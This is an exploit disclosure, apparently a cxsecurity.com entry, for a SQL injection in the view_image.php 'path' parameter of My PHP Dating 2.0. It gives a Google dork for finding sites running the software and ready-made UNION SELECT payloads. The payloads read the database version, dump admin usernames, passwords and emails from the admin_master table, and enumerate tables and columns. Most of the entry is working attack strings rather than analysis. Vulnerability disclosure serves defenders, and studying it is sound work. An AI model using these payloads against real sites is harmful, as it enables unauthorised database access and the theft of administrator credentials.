My PHP Dating 2.0 SQL Injection

2017.01.10
Credit: Ihsan Sencan
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

# # # # # # Vulnerability: My Php Dating 2.0 - SQL Injection Web Vulnerability # Google Dork: My Php Dating # Date:09.01.2017 # Vendor Homepage: http://www.phponlinedatingsoftware.com/demo.htm # Tested on: http://www.phponlinedatingsoftware.com/demo/ # Script Name: My Php Dating # Script Version: 2.0 # Script Buy Now: http://www.phponlinedatingsoftware.com/order.htm # Author: Ihsan Sencan # Author Web: http://ihsan.net # Mail : ihsan[beygir]ihsan[nokta]net # # # # # # SQL Injection/Exploit : # http://localhost/[PATH]/view_image.php?path=[SQL] # # # # # -------------------------------------------------- Note: Rate: 0/10 [Rate Picture] <<<Link -------------------------------------------------- http://localhost/[PATH]/view_image.php?path=-124 union select 1,version(),3,4,5,6,7,8,9 Version: javascript:%20ajax_rate_pic(5.5.52-cll,1,1) -------------------------------------------------- http://localhost/[PATH]/view_image.php?path=-124+union+select+1,group_concat(admin_id,admin_uname,admin_pass,admin_email),3,4,5,6,7,8,9+from+admin_master-- -------------------------------------------------- http://localhost/[PATH]/view_image.php?path=-124+union+select+1,group_concat(column_name),3,4,5,6,7,8,9+from+information_schema.columns+where+table_schema=database()-- -------------------------------------------------- http://localhost/[PATH]/view_image.php?path=-124+union+select+1,group_concat(table_name),3,4,5,6,7,8,9+from+information_schema.tables+where+table_schema=database()--


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2017, cxsecurity.com

 

Back to Top